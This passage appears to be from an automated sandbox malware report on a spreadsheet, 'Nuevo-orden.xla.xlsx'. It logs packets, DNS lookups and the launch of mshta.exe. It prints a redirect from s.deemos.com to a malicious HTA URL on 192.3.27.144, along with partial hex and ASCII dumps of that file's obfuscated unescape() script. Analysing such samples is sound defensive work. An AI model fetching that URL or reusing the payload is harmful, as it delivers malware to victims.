                      Jan 9, 2025 18:46:57.535846949 CET4975580192.168.2.4192.3.27.144
                      Jan 9, 2025 18:46:57.535849094 CET8049755192.3.27.144192.168.2.4
                      Jan 9, 2025 18:46:57.535859108 CET4975580192.168.2.4192.3.27.144
                      Jan 9, 2025 18:46:57.535864115 CET4975580192.168.2.4192.3.27.144
                      Jan 9, 2025 18:46:57.535892010 CET4975580192.168.2.4192.3.27.144
                      Jan 9, 2025 18:46:57.536084890 CET8049755192.3.27.144192.168.2.4
                      Jan 9, 2025 18:46:57.536132097 CET8049755192.3.27.144192.168.2.4
                      Jan 9, 2025 18:46:57.536144018 CET4975580192.168.2.4192.3.27.144
                      Jan 9, 2025 18:46:57.536175013 CET4975580192.168.2.4192.3.27.144
                      Jan 9, 2025 18:46:57.536248922 CET8049755192.3.27.144192.168.2.4
                      Jan 9, 2025 18:46:57.536264896 CET8049755192.3.27.144192.168.2.4
                      Jan 9, 2025 18:46:57.536279917 CET8049755192.3.27.144192.168.2.4
                      Jan 9, 2025 18:46:57.536289930 CET4975580192.168.2.4192.3.27.144
                      Jan 9, 2025 18:46:57.536304951 CET4975580192.168.2.4192.3.27.144
                      Jan 9, 2025 18:46:57.536331892 CET4975580192.168.2.4192.3.27.144
                      Jan 9, 2025 18:46:57.536360025 CET8049755192.3.27.144192.168.2.4
                      Jan 9, 2025 18:46:57.536375046 CET8049755192.3.27.144192.168.2.4
                      Jan 9, 2025 18:46:57.536437988 CET4975580192.168.2.4192.3.27.144
                      Jan 9, 2025 18:46:57.537014961 CET8049755192.3.27.144192.168.2.4
                      Jan 9, 2025 18:46:57.537061930 CET8049755192.3.27.144192.168.2.4
                      Jan 9, 2025 18:46:57.537077904 CET8049755192.3.27.144192.168.2.4
                      Jan 9, 2025 18:46:57.537086964 CET4975580192.168.2.4192.3.27.144
                      Jan 9, 2025 18:46:57.537111044 CET4975580192.168.2.4192.3.27.144
                      Jan 9, 2025 18:46:57.537148952 CET4975580192.168.2.4192.3.27.144
                      Jan 9, 2025 18:46:57.537180901 CET8049755192.3.27.144192.168.2.4
                      Jan 9, 2025 18:46:57.537195921 CET8049755192.3.27.144192.168.2.4
                      Jan 9, 2025 18:46:57.537213087 CET8049755192.3.27.144192.168.2.4
                      Jan 9, 2025 18:46:57.537230015 CET4975580192.168.2.4192.3.27.144
                      Jan 9, 2025 18:46:57.537266970 CET4975580192.168.2.4192.3.27.144
                      Jan 9, 2025 18:46:57.537266970 CET4975580192.168.2.4192.3.27.144
                      Jan 9, 2025 18:46:57.537998915 CET8049755192.3.27.144192.168.2.4
                      Jan 9, 2025 18:46:57.538049936 CET4975580192.168.2.4192.3.27.144
                      Jan 9, 2025 18:46:57.538070917 CET8049755192.3.27.144192.168.2.4
                      Jan 9, 2025 18:46:57.538088083 CET8049755192.3.27.144192.168.2.4
                      Jan 9, 2025 18:46:57.538114071 CET4975580192.168.2.4192.3.27.144
                      Jan 9, 2025 18:46:57.538125038 CET4975580192.168.2.4192.3.27.144
                      Jan 9, 2025 18:46:57.540715933 CET8049755192.3.27.144192.168.2.4
                      Jan 9, 2025 18:46:57.540760994 CET4975580192.168.2.4192.3.27.144
                      Jan 9, 2025 18:46:57.540779114 CET8049755192.3.27.144192.168.2.4
                      Jan 9, 2025 18:46:57.540898085 CET4975580192.168.2.4192.3.27.144
                      Jan 9, 2025 18:46:57.641531944 CET8049755192.3.27.144192.168.2.4
                      Jan 9, 2025 18:46:57.641558886 CET8049755192.3.27.144192.168.2.4
                      Jan 9, 2025 18:46:57.641582966 CET4975580192.168.2.4192.3.27.144
                      Jan 9, 2025 18:46:57.641582966 CET8049755192.3.27.144192.168.2.4
                      Jan 9, 2025 18:46:57.641597986 CET4975580192.168.2.4192.3.27.144
                      Jan 9, 2025 18:46:57.641601086 CET8049755192.3.27.144192.168.2.4
                      Jan 9, 2025 18:46:57.641617060 CET8049755192.3.27.144192.168.2.4
                      Jan 9, 2025 18:46:57.641623020 CET4975580192.168.2.4192.3.27.144
                      Jan 9, 2025 18:46:57.641632080 CET8049755192.3.27.144192.168.2.4
                      Jan 9, 2025 18:46:57.641639948 CET4975580192.168.2.4192.3.27.144
                      Jan 9, 2025 18:46:57.641655922 CET4975580192.168.2.4192.3.27.144
                      Jan 9, 2025 18:46:57.641673088 CET4975580192.168.2.4192.3.27.144
                      Jan 9, 2025 18:46:58.060139894 CET4975580192.168.2.4192.3.27.144
                      Jan 9, 2025 18:46:58.060236931 CET4975580192.168.2.4192.3.27.144
                      TimestampSource PortDest PortSource IPDest IP
                      Jan 9, 2025 18:46:55.049776077 CET5977453192.168.2.41.1.1.1
                      Jan 9, 2025 18:46:55.411261082 CET53597741.1.1.1192.168.2.4
                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Jan 9, 2025 18:46:55.049776077 CET192.168.2.41.1.1.10x1b6aStandard query (0)s.deemos.comA (IP address)IN (0x0001)false
                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Jan 9, 2025 18:46:55.411261082 CET1.1.1.1192.168.2.40x1b6aNo error (0)s.deemos.com14.103.79.10A (IP address)IN (0x0001)false
                      Jan 9, 2025 18:46:56.622354031 CET1.1.1.1192.168.2.40x8765No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                      Jan 9, 2025 18:46:56.622354031 CET1.1.1.1192.168.2.40x8765No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                      • s.deemos.com
                      • 192.3.27.144
                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.449755192.3.27.144808152C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                      TimestampBytes transferredDirectionData
                      Jan 9, 2025 18:46:56.892931938 CET252OUTGET /xampp/mpa/seemebestthingsevermeetgivenbestthingsfornewways.hta HTTP/1.1
                      Accept: */*
                      Accept-Encoding: gzip, deflate
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Connection: Keep-Alive
                      Host: 192.3.27.144
                      Jan 9, 2025 18:46:57.449059010 CET1236INHTTP/1.1 200 OK
                      Date: Thu, 09 Jan 2025 17:46:57 GMT
                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                      Last-Modified: Thu, 09 Jan 2025 12:48:22 GMT
                      ETag: "bb67-62b4564aedd37"
                      Accept-Ranges: bytes
                      Content-Length: 47975
                      Keep-Alive: timeout=5, max=100
                      Connection: Keep-Alive
                      Content-Type: application/hta
                      Data Raw: 3c 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 76 61 72 20 64 20 3d 20 75 6e 65 73 63 61 70 65 28 22 25 36 31 25 36 31 25 36 34 25 33 34 25 33 35 25 33 30 25 36 32 25 33 36 25 36 32 25 33 39 25 36 36 25 36 34 25 33 39 25 33 31 25 33 35 25 33 36 25 32 30 25 36 34 25 32 38 25 33 33 25 32 37 25 33 38 25 33 64 25 33 34 25 32 39 25 36 33 25 34 63 25 35 38 25 35 31 25 35 30 25 32 32 25 30 61 25 32 30 25 35 31 25 34 39 25 35 38 25 34 35 25 36 33 25 34 63 25 35 38 25 35 38 25 35 34 25 37 30 25 34 39 25 35 35 25 35 39 25 34 64 25 35 61 25 32 31 25 36 35 25 33 63 25 37 30 25 33 39 25 32 35 25 37 30 25 32 37 25 35 33 25 35 31 25 35 34 25 34 35 25 35 38 25 34 64 25 34 36 25 35 30 25 34 39 25 36 35 25 36 33 25 34 37 25 35 33 25 35 32 25 35 38 25 34 39 25 35 32 25 35 38 25 32 31 25 36 35 25 32 64 25 32 39 25 32 31 25 32 39 25 35 31 25 35 39 25 35 30 25 34 35 25 35 38 25 34 39 25 32 64 25 32 39 25 37 62 25 36 35 25 36 33 25 32 32 25 30 61 25 32 30 25 34 63 [TRUNCATED]
                      Data Ascii: <script>...(function() { var d = unescape("%61%61%64%34%35%30%62%36%62%39%66%64%39%31%35%36%20%64%28%33%27%38%3d%34%29%63%4c%58%51%50%22%0a%20%51%49%58%45%63%4c%58%58%54%70%49%55%59%4d%5a%21%65%3c%70%39%25%70%27%53%51%54%45%58%4d%46%50%49%65%63%47%53%52%58%49%52%58%21%65%2d%29%21%29%51%59%50%45%58%49%2d%29%7b%65%63%22%0a%20%4c%58%51%50%22%0a%20%46%53%48%5d%22%0a%20%37%47%36%2d%34%58%63%58%3d%34%49%21%65%38%29%3c%38%72%3a%26%37%27%56%2d%34%58%65%22%0a%48%2d%31%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%
                      Jan 9, 2025 18:46:57.449085951 CET1236INData Raw: 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36
                      Data Ascii: 63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%
                      Jan 9, 2025 18:46:57.449110031 CET1236INData Raw: 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36
                      Data Ascii: 63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%6f%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%
                      Jan 9, 2025 18:46:57.449125051 CET1236INData Raw: 35 63 25 35 65 25 35 34 25 33 37 25 34 63 25 32 61 25 32 37 25 35 39 25 33 34 25 33 65 25 33 32 25 34 62 25 33 39 25 34 65 25 33 62 25 32 35 25 35 31 25 33 37 25 33 63 25 35 65 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36
                      Data Ascii: 5c%5e%54%37%4c%2a%27%59%34%3e%32%4b%39%4e%3b%25%51%37%3c%5e%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%
                      Jan 9, 2025 18:46:57.449140072 CET1236INData Raw: 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36
                      Data Ascii: 63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%37%29%58%63%63%63%63%63%63%63%63%63%63%63%
                      Jan 9, 2025 18:46:57.449157000 CET1236INData Raw: 34 38 25 33 33 25 33 38 25 33 37 25 35 36 25 34 61 25 33 31 25 33 64 25 34 39 25 33 31 25 32 35 25 33 37 25 34 37 25 35 30 25 34 64 25 33 63 25 33 63 25 35 32 25 34 38 25 35 38 25 35 65 25 32 36 25 33 34 25 33 33 25 33 31 25 32 65 25 34 35 25 32
                      Data Ascii: 48%33%38%37%56%4a%31%3d%49%31%25%37%47%50%4d%3c%3c%52%48%58%5e%26%34%33%31%2e%45%26%2d%28%2b%49%45%35%59%2a%55%26%5c%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%
                      Jan 9, 2025 18:46:57.449172974 CET1236INData Raw: 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36
                      Data Ascii: 63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%
                      Jan 9, 2025 18:46:57.449187994 CET1236INData Raw: 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36
                      Data Ascii: 63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%
                      Jan 9, 2025 18:46:57.449206114 CET1236INData Raw: 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36
                      Data Ascii: 63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%
                      Jan 9, 2025 18:46:57.449223042 CET1236INData Raw: 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36
                      Data Ascii: 63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%6c%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%
                      Jan 9, 2025 18:46:57.454076052 CET1236INData Raw: 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36
                      Data Ascii: 63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%3a%


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.44975314.103.79.104438152C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                      TimestampBytes transferredDirectionData
                      2025-01-09 17:46:56 UTC255OUTGET /6ruXkfgh?&sherry=strange&octagon=fragile&initiative=rough&corsage HTTP/1.1
                      Accept: */*
                      Accept-Encoding: gzip, deflate
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: s.deemos.com
                      Connection: Keep-Alive
                      2025-01-09 17:46:56 UTC464INHTTP/1.1 302 Found
                      Date: Thu, 09 Jan 2025 17:46:56 GMT
                      Content-Type: text/plain; charset=utf-8
                      Content-Length: 104
                      Connection: close
                      X-DNS-Prefetch-Control: off
                      X-Frame-Options: SAMEORIGIN
                      Strict-Transport-Security: max-age=15724800; includeSubDomains
                      X-Download-Options: noopen
                      X-Content-Type-Options: nosniff
                      X-XSS-Protection: 1; mode=block
                      Location: http://192.3.27.144/xampp/mpa/seemebestthingsevermeetgivenbestthingsfornewways.hta
                      Vary: Accept
                      2025-01-09 17:46:56 UTC104INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 37 2e 31 34 34 2f 78 61 6d 70 70 2f 6d 70 61 2f 73 65 65 6d 65 62 65 73 74 74 68 69 6e 67 73 65 76 65 72 6d 65 65 74 67 69 76 65 6e 62 65 73 74 74 68 69 6e 67 73 66 6f 72 6e 65 77 77 61 79 73 2e 68 74 61
                      Data Ascii: Found. Redirecting to http://192.3.27.144/xampp/mpa/seemebestthingsevermeetgivenbestthingsfornewways.hta


                      Click to jump to process

                      Click to jump to process

                      Click to dive into process behavior distribution

                      Click to jump to process

                      Target ID:0
                      Start time:12:46:01
                      Start date:09/01/2025
                      Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                      Wow64 process (32bit):true
                      Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                      Imagebase:0x490000
                      File size:53'161'064 bytes
                      MD5 hash:4A871771235598812032C822E6F68F19
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:false

                      Target ID:6
                      Start time:12:46:56
                      Start date:09/01/2025
                      Path:C:\Windows\SysWOW64\mshta.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\mshta.exe -Embedding
                      Imagebase:0x7f0000
                      File size:13'312 bytes
                      MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate
                      Has exited:false

                      Target ID:8
                      Start time:12:47:05
                      Start date:09/01/2025
                      Path:C:\Windows\splwow64.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\splwow64.exe 12288
                      Imagebase:0x7ff6cf840000
                      File size:163'840 bytes
                      MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:false

                      Target ID:10
                      Start time:12:47:14
                      Start date:09/01/2025
                      Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                      Wow64 process (32bit):true
                      Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Nuevo-orden.xla.xlsx"
                      Imagebase:0x490000
                      File size:53'161'064 bytes
                      MD5 hash:4A871771235598812032C822E6F68F19
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      No disassembly